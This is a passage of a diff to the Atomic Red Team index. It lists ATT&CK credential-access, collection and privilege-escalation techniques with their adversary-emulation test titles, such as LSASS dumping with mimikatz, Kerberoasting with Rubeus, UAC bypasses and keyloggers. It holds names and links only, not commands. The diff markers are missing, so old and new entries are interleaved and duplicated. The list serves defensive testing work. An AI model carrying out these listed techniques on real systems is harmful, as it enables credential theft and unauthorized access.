@@ -1,270 +1,13 @@
# All Atomic Tests by ATT&CK Tactic & Technique
# credential-access
- [T1003.008 /etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md)
- Atomic Test #1: Access /etc/shadow (Local) [linux]
- Atomic Test #2: Access /etc/passwd (Local) [linux]
- Atomic Test #3: Access /etc/{shadow,passwd} with a standard bin that's not cat [linux]
- Atomic Test #4: Access /etc/{shadow,passwd} with shell builtins [linux]
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1558.004 AS-REP Roasting](../../T1558.004/T1558.004.md)
- Atomic Test #1: Rubeus asreproast [windows]
- Atomic Test #2: Get-DomainUser with PowerView [windows]
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.003 Bash History](../../T1552.003/T1552.003.md)
- Atomic Test #1: Search Through Bash History [linux, macos]
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.005 Cached Domain Credentials](../../T1003.005/T1003.005.md)
- Atomic Test #1: Cached Credential Dump via Cmdkey [windows]
- T1552.005 Cloud Instance Metadata API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.007 Container API](../../T1552.007/T1552.007.md)
- Atomic Test #1: ListSecrets [containers]
- Atomic Test #2: Cat the contents of a Kubernetes service account token file [linux]
- [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
- [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md)
- Atomic Test #1: SSH Credential Stuffing From Linux [linux]
- Atomic Test #2: SSH Credential Stuffing From MacOS [macos]
- [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
- Atomic Test #2: Extract passwords with grep [macos, linux]
- Atomic Test #3: Extracting passwords with findstr [windows]
- Atomic Test #4: Access unattend.xml [windows]
- Atomic Test #5: Find and Access Github Credentials [macos, linux]
- [T1555 Credentials from Password Stores](../../T1555/T1555.md)
- Atomic Test #1: Extract Windows Credential Manager via VBA [windows]
- Atomic Test #2: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] [windows]
- Atomic Test #3: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] [windows]
- Atomic Test #4: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials] [windows]
- Atomic Test #5: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials] [windows]
- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #1: Run Chrome-password Collector [windows]
- Atomic Test #2: Search macOS Safari Cookies [macos]
- Atomic Test #3: LaZagne - Credentials from Browser [windows]
- Atomic Test #4: Simulating access to Chrome Login Data [windows]
- Atomic Test #5: Simulating access to Opera Login Data [windows]
- Atomic Test #6: Simulating access to Windows Firefox Login Data [windows]
- Atomic Test #7: Simulating access to Windows Edge Login Data [windows]
- Atomic Test #8: Decrypt Mozilla Passwords with Firepwd.py [windows]
- [T1552.002 Credentials in Registry](../../T1552.002/T1552.002.md)
- Atomic Test #1: Enumeration for Credentials in Registry [windows]
- Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
- [T1003.006 DCSync](../../T1003.006/T1003.006.md)
- Atomic Test #1: DCSync (Active Directory) [windows]
- Atomic Test #2: Run DSInternals Get-ADReplAccount [windows]
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1187 Forced Authentication](../../T1187/T1187.md)
- Atomic Test #1: PetitPotam [windows]
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #1: AppleScript - Prompt User for Password [macos]
- Atomic Test #2: PowerShell - Prompt User for Password [windows]
- [T1558.001 Golden Ticket](../../T1558.001/T1558.001.md)
- Atomic Test #1: Crafting Active Directory golden tickets with mimikatz [windows]
- Atomic Test #2: Crafting Active Directory golden tickets with Rubeus [windows]
- [T1552.006 Group Policy Preferences](../../T1552.006/T1552.006.md)
- Atomic Test #1: GPP Passwords (findstr) [windows]
- Atomic Test #2: GPP Passwords (Get-GPPPassword) [windows]
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1558.003 Kerberoasting](../../T1558.003/T1558.003.md)
- Atomic Test #1: Request for service tickets [windows]
- Atomic Test #2: Rubeus kerberoast [windows]
- Atomic Test #3: Extract all accounts in use as SPN using setspn [windows]
- Atomic Test #4: Request A Single Ticket via PowerShell [windows]
- Atomic Test #5: Request All Tickets via PowerShell [windows]
- [T1555.001 Keychain](../../T1555.001/T1555.001.md)
- Atomic Test #1: Keychain [macos]
- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #1: Input Capture [windows]
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
- Atomic Test #3: Logging bash history to syslog [linux]
- Atomic Test #4: Bash session based keylogger [linux]
- Atomic Test #5: SSHD PAM keylogger [linux]
- Atomic Test #6: Auditd keylogger [linux]
- [T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md)
- Atomic Test #1: LLMNR Poisoning with Inveigh (PowerShell) [windows]
- [T1003.004 LSA Secrets](../../T1003.004/T1003.004.md)
- Atomic Test #1: Dumping LSA Secrets [windows]
- [T1003.001 LSASS Memory](../../T1003.001/T1003.001.md)
- Atomic Test #1: Dump LSASS.exe Memory using ProcDump [windows]
- Atomic Test #2: Dump LSASS.exe Memory using comsvcs.dll [windows]
- Atomic Test #3: Dump LSASS.exe Memory using direct system calls and API unhooking [windows]
- Atomic Test #4: Dump LSASS.exe Memory using NanoDump [windows]
- Atomic Test #5: Dump LSASS.exe Memory using Windows Task Manager [windows]
- Atomic Test #6: Offline Credential Theft With Mimikatz [windows]
- Atomic Test #7: LSASS read with pypykatz [windows]
- Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows]
- Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
- Atomic Test #10: Powershell Mimikatz [windows]
- Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows]
- Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.003 NTDS](../../T1003.003/T1003.003.md)
- Atomic Test #1: Create Volume Shadow Copy with vssadmin [windows]
- Atomic Test #2: Copy NTDS.dit from Volume Shadow Copy [windows]
- Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows]
- Atomic Test #4: Create Volume Shadow Copy with WMI [windows]
- Atomic Test #5: Create Volume Shadow Copy remotely with WMI [windows]
- Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows]
- Atomic Test #7: Create Volume Shadow Copy with Powershell [windows]
- Atomic Test #8: Create Symlink to Volume Shadow Copy [windows]
- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux [linux]
- Atomic Test #2: Packet Capture macOS [macos]
- Atomic Test #3: Packet Capture Windows Command Prompt [windows]
- Atomic Test #4: Windows Internal Packet Capture [windows]
- [T1003 OS Credential Dumping](../../T1003/T1003.md)
- Atomic Test #1: Gsecdump [windows]
- Atomic Test #2: Credential Dumping with NPPSpy [windows]
- Atomic Test #3: Dump svchost.exe to gather RDP credentials [windows]
- [T1110.002 Password Cracking](../../T1110.002/T1110.002.md)
- Atomic Test #1: Password Cracking with Hashcat [windows]
- [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md)
- Atomic Test #1: Install and Register Password Filter DLL [windows]
- [T1110.001 Password Guessing](../../T1110.001/T1110.001.md)
- Atomic Test #1: Brute Force Credentials of single Active Directory domain users via SMB [windows]
- Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows]
- Atomic Test #3: Brute Force Credentials of single Azure AD user [azure-ad]
- Atomic Test #4: SUDO brute force Debian [linux]
- Atomic Test #5: SUDO brute force Redhat [linux]
- T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1110.003 Password Spraying](../../T1110.003/T1110.003.md)
- Atomic Test #1: Password Spray all Domain Users [windows]
- Atomic Test #2: Password Spray (DomainPasswordSpray) [windows]
- Atomic Test #3: Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos) [windows]
- Atomic Test #4: Password spray all Azure AD users with a single password [azure-ad]
- [T1556.003 Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM module [linux]
- [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #1: Private Keys [windows]
- Atomic Test #2: Discover Private SSH Keys [macos, linux]
- Atomic Test #3: Copy Private SSH Keys with CP [linux]
- Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
- Atomic Test #5: Copy the users GnuPG directory with rsync [macos, linux]
- Atomic Test #6: ADFS token signing and encryption certificates theft - Local [windows]
- Atomic Test #7: ADFS token signing and encryption certificates theft - Remote [windows]
- [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md)
- Atomic Test #1: Dump individual process memory with sh (Local) [linux]
- Atomic Test #2: Dump individual process memory with Python (Local) [linux]
- Atomic Test #3: Capture Passwords with MimiPenguin [linux]
- [T1606.002 SAML Tokens](../../T1606.002/T1606.002.md)
- Atomic Test #1: Golden SAML [azure-ad]
- [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md)
- Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
- Atomic Test #2: Registry parse with pypykatz [windows]
- Atomic Test #3: esentutl.exe SAM copy [windows]
- Atomic Test #4: PowerDump Hashes and Usernames from Registry [windows]
- Atomic Test #5: dump volume shadow copy hives with certutil [windows]
- Atomic Test #6: dump volume shadow copy hives with System.IO.File [windows]
- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1558.002 Silver Ticket](../../T1558.002/T1558.002.md)
- Atomic Test #1: Crafting Active Directory silver tickets with mimikatz [windows]
- T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1539 Steal Web Session Cookie](../../T1539/T1539.md)
- Atomic Test #1: Steal Firefox Cookies (Windows) [windows]
- Atomic Test #2: Steal Chrome Cookies (Windows) [windows]
- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1111 Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1555.004 Windows Credential Manager](../../T1555.004/T1555.004.md)
- Atomic Test #1: Access Saved Credentials via VaultCmd [windows]
# collection
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1560 Archive Collected Data](../../T1560/T1560.md)
- Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows]
- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1560.002 Archive via Library](../../T1560.002/T1560.002.md)
- Atomic Test #1: Compressing data using GZip in Python (Linux) [linux]
- Atomic Test #2: Compressing data using bz2 in Python (Linux) [linux]
- Atomic Test #3: Compressing data using zipfile in Python (Linux) [linux]
- Atomic Test #4: Compressing data using tarfile in Python (Linux) [linux]
- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md)
- Atomic Test #1: Compress Data for Exfiltration With Rar [windows]
- Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows]
- Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows]
- Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
- Atomic Test #5: Data Compressed - nix - zip [linux, macos]
- Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
- Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux]
- [T1123 Audio Capture](../../T1123/T1123.md)
- Atomic Test #1: using device audio capture commandlet [windows]
- Atomic Test #2: Registry artefact when application use microphone [windows]
- [T1119 Automated Collection](../../T1119/T1119.md)
- Atomic Test #1: Automated Collection Command Prompt [windows]
- Atomic Test #2: Automated Collection PowerShell [windows]
- Atomic Test #3: Recon information for export with PowerShell [windows]
- Atomic Test #4: Recon information for export with Command Prompt [windows]
- T1185 Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1115 Clipboard Data](../../T1115/T1115.md)
- Atomic Test #1: Utilize Clipboard to store or execute commands from [windows]
- Atomic Test #2: Execute Commands from Clipboard using PowerShell [windows]
- Atomic Test #3: Execute commands from clipboard [macos]
- Atomic Test #4: Collect Clipboard Data via VBA [windows]
- T1213.003 Code Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213.001 Confluence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
- T1074 Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1530 Data from Cloud Storage Object [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1602 Data from Configuration Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1039 Data from Network Shared Drive](../../T1039/T1039.md)
- Atomic Test #1: Copy a sensitive File over Administive share with copy [windows]
- Atomic Test #2: Copy a sensitive File over Administive share with Powershell [windows]
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #1: AppleScript - Prompt User for Password [macos]
- Atomic Test #2: PowerShell - Prompt User for Password [windows]
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #1: Input Capture [windows]
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
- Atomic Test #3: Logging bash history to syslog [linux]
- Atomic Test #4: Bash session based keylogger [linux]
- Atomic Test #5: SSHD PAM keylogger [linux]
- Atomic Test #6: Auditd keylogger [linux]
- [T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md)
- Atomic Test #1: LLMNR Poisoning with Inveigh (PowerShell) [windows]
- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
- Atomic Test #1: Stage data from Discovery.bat [windows]
- Atomic Test #2: Stage data from Discovery.sh [linux, macos]
- Atomic Test #3: Zip a Folder with PowerShell for Staging in Temp [windows]
- [T1114.001 Local Email Collection](../../T1114.001/T1114.001.md)
- Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows]
- T1602.002 Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1602.001 SNMP (MIB Dump) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1113 Screen Capture](../../T1113/T1113.md)
- Atomic Test #1: Screencapture [macos]
- Atomic Test #2: Screencapture (silent) [macos]
- Atomic Test #3: X Windows Capture [linux]
- Atomic Test #4: Capture Linux Desktop using Import Tool [linux]
- Atomic Test #5: Windows Screencapture [windows]
- Atomic Test #6: Windows Screen Capture (CopyFromScreen) [windows]
- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1125 Video Capture](../../T1125/T1125.md)
- Atomic Test #1: Registry artefact when application use webcam [windows]
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# privilege-escalation
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.004 .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md)
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
- Atomic Test #2: Replace binary of sticky keys [windows]
- T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md)
- Atomic Test #1: Install AppInit Shim [windows]
- [T1546.011 Application Shimming](../../T1546.011/T1546.011.md)
@@ -277,12 +20,10 @@
- Atomic Test #1: At - Schedule a job [linux]
- [T1053.002 At (Windows)](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
- Atomic Test #1: Authentication Package [windows]
- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
- Atomic Test #1: Add a driver [windows]
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md)
- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1548.002 Bypass User Access Control](../../T1548.002/T1548.002.md)
- Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows]
- Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
@@ -290,122 +31,89 @@
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
- Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- Atomic Test #10: UACME Bypass Method 23 [windows]
- Atomic Test #11: UACME Bypass Method 31 [windows]
- Atomic Test #12: UACME Bypass Method 33 [windows]
- Atomic Test #13: UACME Bypass Method 34 [windows]
- Atomic Test #14: UACME Bypass Method 39 [windows]
- Atomic Test #15: UACME Bypass Method 56 [windows]
- Atomic Test #16: UACME Bypass Method 59 [windows]
- Atomic Test #17: UACME Bypass Method 61 [windows]
- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
- Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
- [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
- Atomic Test #1: Change Default File Association [windows]
- [T1078.004 Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, windows, linux, macos]
- [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md)
- Atomic Test #1: COM Hijacking - InprocServer32 [windows]
- Atomic Test #2: Powershell Execute COM Object [windows]
- [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md)
- Atomic Test #1: ListCronjobs [containers]
- Atomic Test #2: CreateCronjob [containers]
- [T1134.002 Create Process with Token](../../T1134.002/T1134.002.md)
- Atomic Test #1: Access Token Manipulation [windows]
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.003 Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- Atomic Test #2: Cron - Add script to cron folder [macos, linux]
- [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1484.002 Domain Trust Modification](../../T1484.002/T1484.002.md)
- Atomic Test #1: Add Federation to Azure AD [azure-ad]
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.006 Dynamic Linker Hijacking](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- [T1055.001 Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.001 Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.014 Emond](../../T1546.014/T1546.014.md)
- Atomic Test #1: Persistance with Event Monitor - emond [macos]
- [T1611 Escape to Host](../../T1611/T1611.md)
- Atomic Test #1: Deploy container using nsenter container escape [containers]
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.011 Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484.001 Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.011 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1484 Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.012 Image File Execution Options Injection](../../T1546.012/T1546.012.md)
- Atomic Test #1: IFEO Add Debugger [windows]
- Atomic Test #2: IFEO Global Flags [windows]
- [T1547.006 Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
- Atomic Test #1: Linux - Load Kernel Module via insmod [linux]
- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.008 LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.006 LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- T1547.008 LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1543.001 Launch Agent](../../T1543.001/T1543.001.md)
- Atomic Test #1: Launch Agent [macos]
- [T1543.004 Launch Daemon](../../T1543.004/T1543.004.md)
- Atomic Test #1: Launch Daemon [macos]
- [T1053.004 Launchd](../../T1053.004/T1053.004.md)
- Atomic Test #1: Event Monitor Daemon Persistence [macos]
- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin privileges [windows]
- Atomic Test #2: Create local account with admin privileges - MacOS [macos]
- T1547.015 Login Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.002 Logon Script (Mac)](../../T1037.002/T1037.002.md)
- Atomic Test #1: Logon Scripts - Mac [macos]
- [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md)
- Atomic Test #1: Logon Scripts [windows]
- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.007 Netsh Helper DLL](../../T1546.007/T1546.007.md)
- Atomic Test #1: Netsh Helper DLL Registration [windows]
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md)
- Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
- Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows]
- Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows]
- Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows]
- Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows]
- T1034 Path Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
